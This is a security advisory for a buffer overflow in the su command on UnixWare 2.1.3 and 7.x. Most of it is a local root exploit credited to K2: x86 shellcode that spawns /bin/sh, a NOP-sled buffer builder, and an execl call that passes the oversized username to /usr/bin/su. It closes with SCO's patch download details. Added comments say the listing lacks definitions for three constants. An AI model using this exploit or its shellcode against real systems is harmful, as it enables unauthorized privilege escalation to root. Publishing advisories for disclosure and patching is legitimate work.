COMMAND

    su

SYSTEMS AFFECTED

    UnixWare 2.1.3, UnixWare 7.0.0 through 7.1.1

PROBLEM

    Discovered by K2.  The su command on SCO's UnixWare 7 has improper
    bounds checking on  the username passed  (via argv[1]), which  can
    cause  a  buffer  overflow  when  a  lengthy  username  is passed.
    Exploit (by K2):

    // UnixWare7 /usr/bin/su local, K2, revisited Oct-30-1999
    #include <unistd.h>
    #include <stdio.h>
    #include <stdlib.h>
    #include <string.h>

    // Payload bytes that end up inside the oversized argv[1] handed to su.
    // Treated as an opaque x86 byte string here: the advisory only names
    // UnixWare 7, and nothing on this page documents what each instruction does.
    // The trailing bytes 2f 62 69 6e 2f 73 68 spell "/bin/sh".
    // The string deliberately contains no 0x00 byte; main() sizes it with strlen().
    char shell[] =
     "\xeb\x48\x9a\xff\xff\xff\xff\x07\xff\xc3\x5e\x31\xc0\x89\x46\xb4"
     "\x88\x46\xb9\x88\x46\x07\x89\x46\x0c\x31\xc0\x50\xb0\x8d\xe8\xdf"
     "\xff\xff\xff\x83\xc4\x04\x31\xc0\x50\xb0\x17\xe8\xd2\xff\xff\xff"
     "\x83\xc4\x04\x31\xc0\x50\x8d\x5e\x08\x53\x8d\x1e\x89\x5e\x08\x53"
     "\xb0\x3b\xe8\xbb\xff\xff\xff\x83\xc4\x0c\xe8\xbb\xff\xff\xff\x2f"
     "\x62\x69\x6e\x2f\x73\x68\xff\xff\xff\xff\xff\xff\xff\xff\xff";

    // Globals shared with main(). DEFOFF, NOPDEF and SIZE are not defined
    // anywhere in this listing, so it does not compile as printed; their
    // intended values are not given on this page.
    const char x86_nop=0x90;   // 0x90 is the single-byte x86 NOP used as filler
    long nop,esp;              // nop: number of leading filler bytes; esp: value sampled by get_esp()
    long offset=DEFOFF;        // adjusted by argv[1] in main(); added to esp when padding the buffer
    char buffer[SIZE];         // the argument string built for su; never NUL-terminated by this code

    /* Returns a stack-pointer value: the inline asm copies %esp into %eax and
       the function has no return statement, so it relies on the GCC/x86
       convention that %eax carries the return value. That is undefined
       behaviour in standard C and is not portable beyond 32-bit x86 GCC. */
    long get_esp() { __asm__("movl %esp,%eax"); }

    /*
     * Builds an oversized "username" string and passes it to /usr/bin/su as
     * argv[1], the argument the advisory above says su does not bounds-check.
     *
     * argv[1] (optional): signed value added to the default offset (base auto-detected by strtol).
     * argv[2] (optional): number of leading filler bytes; NOPDEF is used otherwise.
     *
     * Returns 0 only when execl() itself fails; a successful execl() never returns.
     */
    int main (int argc, char *argv[])
    {
        register int i;

        // nop is a zero-initialised global, so "+=" here starts from 0.
        if (argc > 1) offset += strtol(argv[1], NULL, 0);
        if (argc > 2) nop += strtoul(argv[2], NULL, 0);
        else
            nop = NOPDEF;
        esp = get_esp();

        // Fill the whole buffer with NOPs, then place the payload at index nop.
        // strlen(shell) is only valid because shell[] contains no 0x00 byte.
        // nop is never compared against SIZE, so a large argv[2] makes memcpy
        // write past the end of buffer.
        memset(buffer, x86_nop, SIZE);
        memcpy(buffer+nop, shell, strlen(shell));

        // Pad the rest of the buffer with repeated copies of esp+offset,
        // truncated to int, at 4-byte steps. The starting index depends on
        // nop, so these stores are neither alignment- nor aliasing-safe in
        // standard C; the code assumes 32-bit x86 behaviour.
        for (i = nop+strlen(shell); i < SIZE-4; i += 4)
            *((int *) &buffer[i]) = esp+offset;

        // %x expects an unsigned int but receives a long; only matches where
        // long is 32 bits (ILP32).
        printf("offset = [0x%x]\n",esp+offset);
        // buffer carries no NUL terminator of its own (every byte was set by
        // memset or the stores above), so execl's read of the string runs on
        // into whatever follows buffer in memory.
        execl("/usr/bin/su", "su", buffer, NULL);

        // Reached only if execl() failed.
        printf("exec failed!\n");
        return 0;
    }

SOLUTION

    SCO is  providing an  interim patch  to address  this issue in the
    form  of  a  System  Security  Enhancement  (SSE) package.  SSE039
    contains  replacement  binaries  for  each  system  type,  and  is
    available for Internet  download via anonymous  ftp, and from  the
    SCOFORUM  on  Compuserve.   You  can  download  the SSE package as
    follows:

      Anonymous ftp (World Wide Web URL):
        ftp://ftp.sco.COM/SSE/sse039.ltr    (cover letter, ASCII text)
        ftp://ftp.sco.COM/SSE/sse039.tar.Z  (new binaries, compressed tar file)

      Compuserve:
        GO SCOFORUM, and search  Library 11 (SLS/SSE Files)  for these
        filenames:

        SSE039.LTR      (cover letter, ASCII text)
        SSE039.TAZ      (new binaries, compressed tar file)